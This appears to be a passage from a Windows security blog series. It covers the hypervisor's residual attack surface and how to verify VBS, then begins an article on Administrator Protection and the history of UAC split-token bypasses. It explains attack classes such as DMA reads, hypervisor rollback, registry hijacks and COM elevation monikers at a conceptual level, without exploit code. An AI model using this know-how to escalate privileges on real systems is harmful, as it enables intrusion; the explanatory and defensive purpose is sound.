The threat is again not hypothetical. Bjorn Ruytenberg's Thunderspy disclosure in 2020 documented seven DMA-class vulnerabilities in Thunderbolt 3 firmware, demonstrating that an attacker with physical access could read or modify arbitrary memory on a powered-on system through a malicious peripheral [@thunderspy]. The Microsoft mitigation is Kernel DMA Protection (Windows 10 1803 and later): the hypervisor configures the IOMMU at boot to deny DMA from externally-attached devices outside of explicitly authorized regions, and DMA from any peripheral whose driver has not been loaded under a trusted policy is refused at the IOMMU [@ms-kernel-dma-protection]. The structural residual: pre-boot DMA, before Windows has finished configuring the IOMMU; client motherboards that still ship with VT-d or AMD-Vi disabled in BIOS; OEMs that disable Kernel DMA Protection by default.
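
The gating rule described above can be sketched as a toy model. Everything here is hypothetical (the `makeIommu` helper, the device names, the flat list of ranges); real IOMMUs use per-device translation tables, so treat this only as an illustration of why a disabled or permissive IOMMU removes the protection.

```javascript
// Toy model of IOMMU DMA gating. All names are hypothetical; real hardware
// uses per-device page tables rather than a flat list of ranges.
function makeIommu({ enabled }) {
  const mappings = new Map(); // deviceId -> array of { base, length }
  return {
    // Record a region the OS has explicitly mapped for a device.
    map(deviceId, base, length) {
      const list = mappings.get(deviceId) || [];
      list.push({ base, length });
      mappings.set(deviceId, list);
    },
    // True when the whole [addr, addr + size) range is permitted.
    allowsDma(deviceId, addr, size) {
      if (!enabled) return true; // IOMMU off: every DMA request passes
      const list = mappings.get(deviceId) || [];
      return list.some(
        (r) => addr >= r.base && addr + size <= r.base + r.length
      );
    },
  };
}

const iommuOn = makeIommu({ enabled: true });
iommuOn.map('dock', 0x1000, 0x2000); // region 0x1000..0x3000

console.log(iommuOn.allowsDma('dock', 0x1800, 0x100));    // inside the mapped region
console.log(iommuOn.allowsDma('dock', 0x9000, 0x100));    // outside it: refused
console.log(iommuOn.allowsDma('unknown', 0x1800, 0x100)); // no mapping at all: refused

const iommuOff = makeIommu({ enabled: false });
console.log(iommuOff.allowsDma('unknown', 0x9000, 0x100)); // disabled: nothing is refused
```

The last call is the structural residual in miniature: with the IOMMU off, the check never runs, regardless of what the layers above it enforce.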

11.4 Hypervisor downgrade and rollback

Alon Leviev's "Windows Downdate" at Black Hat USA 2024 disclosed a class of attack that the prior three sections do not cover: rollback of the hypervisor binary itself to a previously-vulnerable, but still validly-signed, build [@nvd-cve-2024-21302].

The structural argument: UEFI Secure Boot prevents loading an unsigned hvix64.exe. It does not prevent loading an older hvix64.exe that is still validly signed and has not been revoked. If Microsoft fixes a Secure Kernel bug in build N+1 and a VTL0 attacker can convince the system to load build N at the next reboot, the patched bug is alive again. CVE-2024-21302 demonstrated exactly this rollback against both the hypervisor and the Secure Kernel through manipulation of the Windows Update servicing pipeline. The mitigation is mandatory-update servicing combined with proactive revocation list (dbx) hygiene -- once an older binary's hash is in the UEFI revocation list, Secure Boot will refuse to load it -- and Microsoft completed mitigations across Windows 10 1507 through Windows Server 2019 in the July 8, 2025 update wave [@nvd-cve-2024-21302].
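
The gap can be made concrete with a toy load decision. This is a sketch under stated assumptions: the `secureBootAllows` function, the field names, and the hash strings are all hypothetical, and the real Secure Boot check involves certificate chains rather than a boolean.

```javascript
// Toy model of the Secure Boot load decision. Field names and hash strings
// are hypothetical placeholders, not real values.
function secureBootAllows(binary, dbx) {
  if (!binary.validSignature) return false; // unsigned or tampered: refused
  if (dbx.has(binary.hash)) return false;   // explicitly revoked: refused
  return true;                              // the build's age is never consulted
}

const buildN = { build: 'N', hash: 'hash-of-build-N', validSignature: true };
const buildN1 = { build: 'N+1', hash: 'hash-of-build-N1', validSignature: true };
const unsigned = { build: 'custom', hash: 'hash-of-custom', validSignature: false };

const dbxBefore = new Set();                    // old build not yet revoked
const dbxAfter = new Set(['hash-of-build-N']);  // old build's hash added to dbx

console.log(secureBootAllows(unsigned, dbxBefore)); // false
console.log(secureBootAllows(buildN, dbxBefore));   // true: the rollback window
console.log(secureBootAllows(buildN, dbxAfter));    // false: revocation closes it
console.log(secureBootAllows(buildN1, dbxAfter));   // true
```

Nothing in the decision compares build numbers, which is why revocation-list hygiene, and not signature checking alone, is what closes the rollback path.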

flowchart TD
  HW["Hardware (CPU, RAM, IOMMU, TPM)"]
  SM["System Management Mode (Ring -2) -- residual: SMM handler bugs"]
  FW["UEFI firmware -- residual: LogoFAIL, BootHole, BlackLotus"]
  DR["DRTM ACM (Intel TXT / AMD SKINIT)"]
  HV["Microsoft Hypervisor (hvix64 / hvax64)"]
  Iommu["IOMMU (VT-d / AMD-Vi) -- residual: Thunderspy, pre-boot DMA"]
  Vtl1["VTL1 (Secure Kernel + trustlets)"]
  Vtl0["VTL0 (NT kernel + user mode)"]
  Side["Microarchitectural side channels -- Spectre / Meltdown / MDS / Retbleed"]
  Update["Windows Update servicing -- residual: hypervisor rollback (CVE-2024-21302)"]
  HW --> SM
  SM --> FW
  FW --> DR
  DR --> HV
  HV --> Iommu
  HV --> Vtl1
  HV --> Vtl0
  Side -.->|"cross all boundaries"| HV
  Update -.->|"can roll hypervisor back"| HV

The hypervisor is necessary but not sufficient. The firmware-Secure-Boot-DRTM substrate beneath it, the microarchitectural ceiling above it, the IOMMU configuration beside it, and the Windows Update pipeline that decides which hypervisor build runs next are co-equal members of the same boundary. None of them is the hypervisor; all of them have to do their job for the hypervisor's guarantees to hold. The substrate is real, but the boundary is the combination of the substrate and what holds it up.

Necessary, not sufficient. That phrase is the article's honest answer to the question "how good is the substrate?" The answer is that the substrate is genuine, the boundary is published, the bounty calibration is the highest in the industry, the public CVE record is alive and narrow, and the residual attack surface lives in places the hypervisor cannot by construction control. The substrate is what we have explored in detail; what holds it up is what we have just sketched. The last section turns from theory to practice.

12. Practical Guide, FAQ, and Closing

If you have read this far, the natural next question is "is this on, on my machine, and how do I check?" The practical answer is short.

12.1 Enabling and verifying VBS

VBS is configurable through several paths: Group Policy (Computer Configuration > Administrative Templates > System > Device Guard), Intune, MDM CSPs (DeviceGuard/EnableVirtualizationBasedSecurity, DeviceGuard/ConfigureSystemGuardLaunch), the Windows Security UI, or directly via bcdedit /set hypervisorlaunchtype Auto. Verification is best done with three small commands.

msinfo32 -> the Device Guard / Virtualization-based Security row. "Services Configured" lists what policy has requested; "Services Running" lists what is actually active. Kernel DMA Protection and Secure Launch each appear as their own row.
Get-CimInstance -ClassName Win32_DeviceGuard -> VirtualizationBasedSecurityStatus (0 = off, 1 = enabled but not running, 2 = running); SecurityServicesRunning array (HVCI, Credential Guard, etc.); RequiredSecurityProperties (the policy floor).
bcdedit /enum -> hypervisorlaunchtype Auto is the default; loadoptions DISABLE_VBS_* is how an administrator can opt out (you should not see these flags on a properly-configured machine).

{`
// Given a parsed Win32_DeviceGuard object, compute whether VBS is healthy.
// The actual Win32_DeviceGuard schema is on Microsoft Learn; this is the
// decision logic an operator would write against it.
function checkVbsHealth(dg) {
  const result = { ok: false, reasons: [] };
  // Treat a missing array as empty so the checks below cannot throw.
  const running = dg.SecurityServicesRunning || [];
  const available = dg.AvailableSecurityProperties || [];

  // VBS itself
  if (dg.VirtualizationBasedSecurityStatus !== 2) {
    result.reasons.push('VBS is not running (status != 2)');
  }

  // HVCI (Memory Integrity)
  if (!running.includes(2)) {
    result.reasons.push('HVCI / Memory Integrity is not running');
  }

  // Credential Guard
  if (!running.includes(1)) {
    result.reasons.push('Credential Guard is not running');
  }

  // Hardware floor, checked against AvailableSecurityProperties:
  // 1 = hypervisor support, 2 = Secure Boot, 3 = DMA protection.
  const requiredFloor = [1, 2, 3];
  for (const r of requiredFloor) {
    if (!available.includes(r)) {
      result.reasons.push('Missing required security property: ' + r);
    }
  }

  result.ok = result.reasons.length === 0;
  return result;
}

const example = {
  VirtualizationBasedSecurityStatus: 2,
  SecurityServicesRunning: [1, 2, 3],
  AvailableSecurityProperties: [1, 2, 3, 4, 5],
};
console.log(JSON.stringify(checkVbsHealth(example), null, 2));
// -> ok is true and reasons is an empty array
`}

Note: Three commands, in order: msinfo32 for the human-readable summary; Get-CimInstance -ClassName Win32_DeviceGuard | Format-List * for the structured detail; bcdedit /enum {current} to confirm hypervisorlaunchtype Auto and the absence of DISABLE_VBS_* load options. If all three agree that VBS, HVCI, and Credential Guard are running, you are in the configuration this article describes.
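
The third check can be sketched as a small parser over captured `bcdedit /enum {current}` text. This is an illustration under assumptions: the `checkBcdedit` helper and the sample lines are hypothetical, the parser assumes the usual two-column "name, whitespace, value" layout, it treats a missing `hypervisorlaunchtype` line as not-Auto, and it matches the opt-out flag with either a hyphen or an underscore because the exact spelling on a given build is not confirmed here.

```javascript
// Parse captured `bcdedit /enum {current}` text and flag VBS opt-outs.
// Assumes a two-column "name   value" layout; sample text is hypothetical.
function checkBcdedit(text) {
  const entries = {};
  for (const line of text.split(/\r?\n/)) {
    const m = line.match(/^(\S+)\s+(.+)$/);
    if (m) entries[m[1].toLowerCase()] = m[2].trim();
  }

  const reasons = [];
  const launch = entries.hypervisorlaunchtype;
  // Assumption: a missing line is reported as a problem rather than ignored.
  if (!launch || launch.toLowerCase() !== 'auto') {
    reasons.push('hypervisorlaunchtype is not Auto');
  }
  // Accept either separator, since the flag spelling is not verified here.
  if (/DISABLE[-_]VBS/i.test(entries.loadoptions || '')) {
    reasons.push('loadoptions contains a VBS opt-out flag');
  }
  return { ok: reasons.length === 0, reasons };
}

const healthyText = [
  'Windows Boot Loader',
  '-------------------',
  'identifier              {current}',
  'hypervisorlaunchtype    Auto',
].join('\n');

const optedOutText = [
  'Windows Boot Loader',
  '-------------------',
  'identifier              {current}',
  'loadoptions             DISABLE-VBS',
  'hypervisorlaunchtype    Off',
].join('\n');

console.log(checkBcdedit(healthyText));
console.log(checkBcdedit(optedOutText));
```

Parsing text output is brittle across locales and Windows builds, so this is best treated as a cross-check on the structured `Win32_DeviceGuard` result, not a replacement for it.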

12.2 Operational pitfalls

Two operational realities are worth flagging. First, HVCI has a driver block list and will refuse to enable Memory Integrity if any incompatible driver is installed; the usual offenders are older anti-cheat drivers, third-party virtualization clients (VMware Workstation pre-2021, VirtualBox pre-6.1), and certain disk-encryption or storage-filter drivers. Microsoft maintains a public block list; the Memory Integrity UI in Windows Security will report the specific blocking driver. Second, nested virtualization is supported for Hyper-V guests on Windows 10/11 client and Server 2016+, and is required by some development workflows (WSL2 with nested containers, certain Visual Studio device emulators). Nested virtualization changes the threat model: the L0 hypervisor still owns the box, and the L1 guest now runs its own hypervisor with its own VTL split. Even so, a compromised L1 guest with VBS enabled does not give an attacker inside it a path to the L0 host.

12.3 The substrate cross-reference

This article is the substrate of the Windows security series at paragmali.com. The siblings build on what is here:

Secure Boot in Windows -- the static-RTM half of the boot trust chain that hands off to the hypervisor.
VBS Trustlets: What Actually Runs in the Secure Kernel -- the VTL1 internals that the hypervisor's secure-call ABI delivers requests to.
NTLMless: The Death of NTLM in Windows -- the Credential Guard story from inside LSAISO.
Adminless: Administrator Protection in Windows -- the user-mode admin trust model that the kernel-mode VBS boundary makes possible.
Can This Code Do This? Windows Access Control -- the access-control surface that VBS supplements but does not replace.

12.4 Frequently asked questions

The 10-30 percent number is folklore from the pre-SLAT era or from systems running HVCI-incompatible drivers in compatibility mode. For typical workloads on modern hardware (post-2018 CPUs with VT-x or AMD-V and SLAT), the measured overhead of VBS plus HVCI plus Credential Guard sits in the low single digits. Gaming and high-throughput I/O workloads can show larger gaps, especially on systems where the BIOS forces nested virtualization off or where IOMMU is disabled. The trade-off for that overhead is the security-boundary set described in this article.

No. VBS is a Virtual Trust Level split *inside* the root partition. There are no extra VMs. The normal Windows install is VTL0; the Secure Kernel plus its trustlets is VTL1. Both VTLs live in the same partition, share the same physical CPU, and are scheduled by the hypervisor as separate VTL contexts -- not as separate VMs. A Hyper-V guest VM, by contrast, is a child partition entirely separate from the root partition. The two architectures share a hypervisor binary but use different parts of it.

No. SYSTEM is a high VTL0 user-mode token; the hypervisor sits architecturally above all of Ring 0, which is where SYSTEM-loaded kernel drivers ultimately run. The point of the entire article is that "SYSTEM owns the box" is wrong on a VBS-enabled Windows install. SYSTEM is the most privileged Windows identity; the hypervisor is the most privileged *software*, and the two are not the same thing.

No. Secure Boot prevents loading an *unsigned* `hvix64.exe`. It does not prevent loading an older, signed-but-vulnerable `hvix64.exe` that has not been added to the UEFI revocation list. That gap is what CVE-2024-21302 (Windows Downdate) exploited, and the mitigation is mandatory-update servicing combined with prompt revocation-list (`dbx`) hygiene [@nvd-cve-2024-21302].

No. seL4 is formally verified at approximately ten thousand lines of code with a roughly twenty-five-person-year proof effort. The Microsoft hypervisor is unverified at an estimated one to two hundred thousand lines of code. The hypervisor's security argument is operational -- a small TCB, heavy continuous fuzzing, a standing $5K-$250K bounty, public servicing criteria, an unflinching public CVE record -- rather than mathematical [@sel4-whitepaper, @ms-msrc-bounty-hyperv].

Yes, in terms of binary identity, servicing criteria, and bounty eligibility. The Microsoft hypervisor that boots on a Windows 11 client laptop and the one that boots on an Azure host server are derived from the same codebase, ship with the same servicing commitments, and qualify for the same Hyper-V bounty. The threat model differs -- Azure adds multi-tenant guest-to-guest isolation, hardware confidential-VM extensions, and a different management surface -- but the substrate is shared.

12.5 Closing

The reason SYSTEM on a Windows 11 box cannot read LSASS, load an unsigned driver, or patch ntoskrnl.exe is now fully accounted for. An hvix64.exe or hvax64.exe loaded by hvloader.efi before winload.exe ever ran. A VTL split inside the root partition, made possible by Hepkin and Kishan's 2013 patent and shipped with Windows 10 RTM in 2015. Per-VTL SLAT enforcement that the NT kernel architecturally cannot touch, because the SLAT tables live in pages the hypervisor never maps into a VTL0 view. A Microsoft-published security boundary and a $5,000-$250,000 bounty calibrating the boundary's value, both of which are unique in the industry at this writing. A public CVE record of six worked examples across three narrow classes that the boundary has had to pay out on since 2018. And a residual attack surface -- firmware below, side channels above, IOMMU bypass beside, hypervisor rollback through the update pipeline -- that the substrate cannot, by construction, eliminate.

The hypervisor is what every other article in this series sits on. Now you have the substrate in hand. The Secure Kernel article reads differently when you have walked the per-VTL SLAT yourself. The Credential Guard article reads differently when you know that LSAISO is invoked through a hypercall-mediated secure call. The Secure Boot article reads differently when you know that the hypervisor's DRTM measurement re-establishes the trust root after firmware. The Adminless article reads differently when you know that the privilege ceiling on Windows 11 is not Ring 0 but a hardware boundary above it.

Above Ring Zero is not a metaphor. It is an instruction-set state. The Windows hypervisor lives there, owns the page tables that say what the OS can see, and is the architectural reason "SYSTEM-on-Windows-11" cannot do things SYSTEM used to be allowed to do.

Adminless: How Windows Finally Made Elevation a Security Boundary

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**Administrator Protection (informally "Adminless") replaces Windows 11's split-token UAC with a separate, system-managed local user account.** The operating system creates this **System Managed Administrator Account (SMAA)** per local admin, links it to the primary admin via paired SAM attributes, and uses it to host elevated processes in a fresh logon session gated by Windows Hello. The kernel asks LSA to authenticate "a new instance of the shadow administrator" without any SMAA credential because the SMAA has none. The mechanism makes the elevation path a security boundary for the first time, with bulletin-grade fixes when it fails. Microsoft shipped it in KB5067036 on October 28, 2025, then reverted it on December 1, 2025 over an application-compatibility issue, not a security failure. This article walks the twenty-year argument that produced the design, the nine pre-GA bypasses Forshaw found and Microsoft fixed, and exactly where the new boundary still leaks.

1. Two tokens, one user, twenty years

Open an elevated console on a Windows 11 device with the registry value TypeOfAdminApprovalMode = 2 set, and run whoami /all. The user name is no longer yours. It is ADMIN_<sixteen random characters> -- a local account you never created, owned by an operating-system component you never ran, in a logon session that did not exist five seconds ago and will not exist five seconds after the console closes.

For twenty years, an elevated Windows command prompt reported the same user name as the unelevated one. The integrity level changed. The token changed. The user did not. That single architectural fact is the load-bearing premise of every UAC bypass ever published. The Vista User Account Control design from 2006 issued two tokens at logon for a member of the local Administrators group: a filtered standard-user token for everyday work, and a full admin token linked to it via the TokenLinkedToken field [@ms-uac-how-it-works]. When the user clicked Yes on a consent prompt, the Application Information service called CreateProcessAsUser with the linked token. Same user. Same profile. Same HKCU. Same logon session. Different integrity level.

Four resources stayed shared between the filtered and full tokens, and four categories of attack grew out of them. Files dropped in a writable directory the elevated process trusts. Registry values planted under HKEY_CURRENT_USER that an elevated binary reads before it consults HKEY_CLASSES_ROOT. COM elevation monikers that hand the attacker an elevated IFileOperation interface. Path-resolution overrides that redirect %SystemRoot% for a single auto-elevating process. The UACMe project [@uacme] catalogues 81 such methods, each one exploiting the shared-resource shape of Vista's split token.

Administrator Protection inverts that shape. The elevated administrator becomes a different account with a different security identifier, a different profile directory, a different NTUSER.DAT hive, a different authentication-ID LUID, and a different DOS device object directory under \Sessions\0\DosDevices\. The operating system manages the account itself: it creates the account on demand the first time the policy is enabled, links it to the primary admin via paired Security Account Manager attributes, uses it in a fresh logon session for every elevation, and destroys the elevated token when the process exits [@ms-developer-blog-2025, @call4cloud-osint].

The feature ships under four names -- Administrator Protection in Microsoft Learn, Adminless as the community shorthand this article uses, ShadowAdmin in the samsrv.dll engineering symbols, System Managed Administrator Account (SMAA) in the Windows Developer Blog [@ms-admin-protection, @ms-developer-blog-2025, @call4cloud-osint] -- and §6 walks each in turn. The launch arc was short: announced at Ignite 2024 by David Weston on November 19, 2024 [@bleepingcomputer-2024], surfaced earlier that fall in Insider Preview build 27718 on October 2, 2024 [@ms-insider-build-27718], shipped to stable Windows in KB5067036 on October 28, 2025 [@ms-kb5067036], and disabled on December 1, 2025 over a WebView2 application-compatibility regression [@forshaw-pz-jan2026, @ms-admin-protection].

This article walks what changed and what did not. By the end you will know exactly which UAC bypass families are dead, exactly which survive, exactly what the December 2025 revert was about, and exactly where the new boundary still leaks. The path runs through twenty years of design tradeoffs and seven years of binary-level fixes that never converged on a real boundary. It runs through nine Project Zero bypasses Microsoft fixed before shipping. It ends at a question Microsoft's own design documents do not yet answer: when the prompt is a credential gate instead of a click-through, what is left for the attacker to do?

The first thing to understand is what UAC was trying to do, and why Microsoft said for twenty years it was not a security boundary.

2. "Convenience, not boundary": UAC as Microsoft conceived it

Why did Vista ship UAC at all? For most of Windows history, every interactive logon for a member of the local Administrators group produced one full-admin token. The desktop shell ran as a full administrator. Every child process inherited those rights. The worm era of 2003 to 2005 demonstrated, repeatedly, that one process running in user context owned the whole machine. By 2006 the cost of admin-by-default had become impossible to defend [@wikipedia-uac].

The pre-Vista Limited User Account (LUA) was Microsoft's first attempt at a fix. The conceptual ancestor of the filtered token failed in practice because roughly half of the third-party application base broke under it, and the documented workaround -- RUNAS.EXE -- was operationally hostile enough that almost no one used it.

The redesign that produced UAC pivoted on a single observation. Forcing administrators to run as standard users had failed because too much software assumed admin rights. So Vista would give each admin user two identities. One would be standard-user enough to run the desktop, the browser, and the day-to-day applications without privilege. The other would carry the admin rights, and the operating system would arrange for the user to opt into it on a per-task basis.

Mark Russinovich's June 2007 article Inside Windows Vista User Account Control in TechNet Magazine [@russinovich-2007-vista] remains the canonical reference for the design. The mechanism has four parts: two tokens at logon; an integrity-level taxonomy (Low, Medium, High, System) gating object access; file-system and registry virtualisation rerouting writes by legacy apps; and Mandatory Integrity Control enforcing the no-write-up rule at the kernel-object boundary.

Split token: the mechanism by which Vista UAC assigns two distinct access tokens to a single interactive logon for a member of the local Administrators group. The Local Security Authority issues both at logon: a filtered standard-user token with most privileges removed and the Administrators group marked as deny-only, and a linked full administrator token referenced from the filtered token's `TokenLinkedToken` field [@ms-uac-how-it-works].

The disclaimer that follows the design is the single most quoted sentence Russinovich ever published about UAC. The article will lift it verbatim once, because every Administrator Protection design decision falls out of its absence:

It's important to be aware that UAC elevations are conveniences and not security boundaries. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007 [@russinovich-2007-vista]

This is not an accidental disclaimer. It is the canonical Microsoft classification, preserved into the Microsoft Security Servicing Criteria document [@msrc-servicing-criteria]. James Forshaw of Google Project Zero, writing in January 2026, re-states the position: "due to the way it was designed, it was quickly apparent it didn't represent a hard security boundary, and Microsoft downgraded it to a security feature" [@forshaw-pz-jan2026]. The classification is what determined what Microsoft would and would not pay attention to. A "security boundary" gets a security bulletin when an attacker crosses it. A "security feature" does not. A bypass of a boundary is a vulnerability. A bypass of a feature is a quality bug. For twenty years, UAC bypasses were quality bugs.

The two-tokens-at-logon mechanism is the shape from which the entire bypass canon grows. The twenty years of evolution that follow run along a single timeline.

timeline
  title Privilege separation in Windows, NT 3.1 to Administrator Protection
  1993 : NT 3.1 ships multi-user accounts and DACLs but admin-by-default desktop culture
  2006 : Vista UAC introduces the split-token model and Mandatory Integrity Control
  2009 : Davidson publishes the first UAC bypass; Windows 7 ships auto-elevation
  2014 : hfiref0x's UACMe catalogue collects the bypass canon
  2016 : enigma0x3 publishes the registry-hijack family (eventvwr, fodhelper, sdclt)
  2019 : CVE-2019-1388 (consent.exe certificate dialog) is the lone UAC LPE bulletin
  2024 : Insider Preview build 27718 surfaces Administrator Protection; Ignite 2024 announces it
  2025 : KB5067036 ships the SMAA on stable Windows, then reverts on December 1
  2026 : Forshaw's nine pre-GA bypasses all fixed; the elevation path is now a security boundary

To see why the entire bypass canon grew out of the split-token shape, the next section walks the mechanic at function-name granularity. It is the load-bearing pre-history of everything that comes after.

3. The Vista UAC split-token in detail

The mechanics at logon. The Local Security Authority Subsystem Service (LSASS) validates credentials. For a user in the local Administrators group, it constructs two tokens. The filtered token has its dangerous privileges removed and the Administrators SID marked deny-only; the full token retains them. The Token Manager wires the filtered token's TokenLinkedToken field to a handle on the full token. LSASS hands the filtered token to winlogon.exe. Winlogon launches userinit.exe. Userinit launches explorer.exe. The shell, holding the filtered token, becomes the parent process from which every user-initiated process inherits [@ms-uac-how-it-works].

Linked token (`TokenLinkedToken`): the kernel structure that connects the filtered standard-user token to the linked full administrator token in Vista's split-token model. A process holding the filtered token can query the `TokenLinkedToken` field via the `GetTokenInformation` API to obtain a handle to the full token. A caller holding `SeTcbPrivilege`, such as the Application Information service, receives a primary token it can pass to `CreateProcessAsUser` to launch an elevated child; an unprivileged caller receives only an identification-level impersonation token. The same link is the structural premise of token-stealing attacks: any code path that can obtain or impersonate a usable linked token bypasses the consent UI entirely [@ms-uac-how-it-works, @forshaw-pz-jan2026].

The shell shares four resources with anything launched under the full token.

The same user security identifier. Both tokens carry the same primary SID. Files, registry keys, and kernel objects that grant access to the user grant identical access to both processes.
The same %USERPROFILE% directory tree. C:\Users\<user>\ is the home of both. The Documents folder, the Downloads folder, the AppData hives, and any application-specific subdirectory belong to one user.
The same HKEY_CURRENT_USER hive. Both tokens map HKCU to the same NTUSER.DAT file. An elevated process that reads a user setting reads the value the unelevated user wrote.
The same logon-session LUID. The Locally Unique Identifier that identifies an interactive logon session is the same on both tokens. The kernel uses that LUID as a key for per-logon-session caching: the DOS device object directory at \Sessions\0\DosDevices\<LUID>, drive-letter mappings, mapped network drives, and the credential cache.
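
The four-item list above can be expressed as a comparison between two token descriptors. This is a sketch, assuming simplified descriptors: the field names, SID strings, paths, and LUID values are all hypothetical placeholders, and the second comparison reflects the separate-account shape of Administrator Protection as this article describes it in section 1.

```javascript
// Compare two token descriptors on the four resources listed above.
// All values are hypothetical placeholders, not real SIDs, paths, or LUIDs.
const RESOURCES = ['userSid', 'profileDir', 'hkcuHive', 'logonSessionLuid'];

function sharedResources(a, b) {
  return RESOURCES.filter((key) => a[key] === b[key]);
}

const filteredToken = {
  userSid: 'S-1-5-21-EXAMPLE-1001',
  profileDir: 'C:\\Users\\alice',
  hkcuHive: 'C:\\Users\\alice\\NTUSER.DAT',
  logonSessionLuid: '0x0003e7a1',
};

// Split-token model as the list describes it: every field is identical.
const splitTokenElevated = { ...filteredToken };

// Separate-account model: a different account, profile, hive, and session.
const separateAccountElevated = {
  userSid: 'S-1-5-21-EXAMPLE-1002',
  profileDir: 'C:\\Users\\ADMIN_EXAMPLE',
  hkcuHive: 'C:\\Users\\ADMIN_EXAMPLE\\NTUSER.DAT',
  logonSessionLuid: '0x0009b2c4',
};

console.log(sharedResources(filteredToken, splitTokenElevated));
console.log(sharedResources(filteredToken, separateAccountElevated));
```

Each entry in the first result is a channel through which unelevated code can influence an elevated process; the second result being empty is the design goal of the separate-account model.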

The elevation pipeline. A user clicks Yes on a UAC prompt. The mechanism beneath that click runs through a chain of named function calls.

sequenceDiagram
participant User as User shell (filtered token)
participant AppInfo as appinfo.dll (Application Information service)
participant Consent as consent.exe (secure desktop)
participant LSA as LSASS
participant New as Elevated child process

User->>AppInfo: ShellExecute / CreateProcess "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read manifest requestedExecutionLevel
AppInfo->>AppInfo: Check ConsentPromptBehaviorAdmin
AppInfo->>Consent: Launch consent.exe on Winlogon desktop
Consent->>User: Show Yes / No prompt
User-->>Consent: Click Yes
Consent-->>AppInfo: Approved
AppInfo->>LSA: Resolve TokenLinkedToken handle
AppInfo->>New: CreateProcessAsUser(linked full token)
Note over New: Same SID and profile and HKCU and logon session
Note over New: Integrity level High

The prompt runs on the secure desktop, the same Winlogon-owned Winsta0\Winlogon desktop where the credential-entry dialog appears at logon, not the user's interactive Winsta0\Default desktop [@ms-uac-how-it-works]. User Interface Privilege Isolation (UIPI) blocks lower-integrity input from reaching higher-integrity windows; the secure-desktop switch is its first defence against synthetic-keystroke attacks against the prompt itself.

The secure desktop is not invulnerable. It changes the integrity-isolation context, but a process holding the filtered token can still trigger the switch (that is the whole point of clicking Yes), and code running before the switch can in principle modify the surrounding UI state. CVE-2019-1388 in late 2019 turned out to exploit a different aspect entirely -- a UI-interaction path through the consent.exe certificate-viewer dialog -- and not the secure-desktop switch itself.

Compare this to what comes next. Both tokens share four resources. Each of those resources is a category of attack waiting for a researcher to find it. The next section is the story of what happened when Microsoft tried to make UAC less annoying by silently elevating its own Microsoft-signed binaries -- and what the bypass canon did with the change.

4. Windows 7 auto-elevation and the birth of the bypass canon

A specific moment. December 2009. Leo Davidson publishes Windows 7 UAC whitelist: Code-injection Issue / Anti-Competitive API / Security Theatre on pretentiousname.com [@davidson-2009]. The title is the argument. The page itself is sprawling, contentious, and on a few key technical points exactly right. Microsoft's response, in Davidson's own words: "this is a non-issue, and ignored my offers to give them full details for several months." Microsoft Security Essentials eventually classified the binary (not the technique) as HackTool:Win32/Welevate.A and HackTool:Win64/Welevate.A; in Davidson's pointed observation, "recompiling the binaries in VS2010 means they are no longer detected" [@davidson-2009].

Davidson kept writing into his original page over the following decade. A marker buried inside the text reads "As I was typing more words into this page, this appeared in my text editor at the 10,000th word!" In March 2020 he removed the proof-of-concept binaries, noting "I got sick of the page being marked as malware, even by Google (FFS)." The prose remains the canonical first source on UAC bypasses [@davidson-2009].

What Windows 7 added, in October 2009, to fix Vista's prompt-fatigue problem [@russinovich-2009-win7]:

The autoElevate=true manifest attribute, embedded in selected Microsoft-signed Windows binaries.
An internal whitelist of Microsoft-signed binaries living under %SystemRoot%\System32.
The COM Elevation Moniker -- already shipping in Vista (BIND_OPTS3, syntax Elevation:Administrator!new:<CLSID>) -- was the activation primitive. Windows 7 extended implicit auto-elevation to qualifying COM servers whose registrations matched the new whitelist criteria, so callers such as IFileOperation, ICMLuaUtil, and IColorDataProxy could be launched elevated without a consent prompt under the Win7 model [@russinovich-2009-win7, @uacme]. The dedicated registry-curation surface, the COMAutoApprovalList (HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList) that UACMe Method 49 references verbatim, did not ship in Windows 7; it was introduced seven years later in Windows 10 RS1 (build 14393, August 2016) as a Redstone-1 hardening that replaced implicit COM auto-elevation with explicit list curation [@uacme].
The default consent-prompt behaviour ConsentPromptBehaviorAdmin = 5: prompt for consent for non-Windows binaries [@russinovich-2009-win7].

Auto-elevation: The Windows 7 mechanism by which selected Microsoft-signed binaries elevate without showing the consent prompt to a user who is a member of the local Administrators group. The Application Information service consults a whitelist of signature, path, and manifest attributes; if the binary qualifies, `appinfo.dll` calls `CreateProcessAsUser` with the linked full token and no UI step at all [@russinovich-2009-win7].

COM Elevation Moniker: A COM activation syntax introduced in Windows Vista that lets an unelevated caller request an elevated instance of a COM server class. The `IBindCtx` is augmented with a `BIND_OPTS3` structure carrying a window handle to attribute the prompt to. The bind moniker `Elevation:Administrator!new:<CLSID>` causes the COM Service Control Manager to launch the server elevated. UACMe methods that target `IFileOperation`, `ICMLuaUtil`, and `IColorDataProxy` all descend from this mechanism [@russinovich-2009-win7, @uacme].
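The whitelist decision described above can be pictured as a pure predicate over three properties of a binary. The following is a minimal sketch under stated assumptions, not the logic inside `appinfo.dll`: the function `qualifiesForAutoElevation` and the fields `signedByMicrosoft`, `path`, and `autoElevate` are hypothetical names, and the real checks are considerably stricter.

```javascript
// Toy model of the Windows 7 auto-elevation criteria named in the text:
// Microsoft signature, location under %SystemRoot%\System32, and the
// autoElevate=true manifest attribute. All names here are illustrative.
const SYSTEM32 = 'c:\\windows\\system32\\';

function qualifiesForAutoElevation(binary) {
  const path = binary.path.toLowerCase();
  return binary.signedByMicrosoft === true &&
         path.startsWith(SYSTEM32) &&
         binary.autoElevate === true;
}

const sysprep = {
  path: 'C:\\Windows\\System32\\sysprep\\sysprep.exe',
  signedByMicrosoft: true,
  autoElevate: true,
};
const thirdParty = {
  path: 'C:\\Program Files\\Vendor\\setup.exe', // hypothetical installer
  signedByMicrosoft: false,
  autoElevate: true, // a manifest claim alone is not enough
};

console.log('sysprep.exe auto-elevates: ', qualifiesForAutoElevation(sysprep));
console.log('vendor setup auto-elevates:', qualifiesForAutoElevation(thirdParty));
```

The point of the sketch is that the predicate looks only at properties of the binary, never at what the binary is about to load or execute, which is the gap the bypass families exploit.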

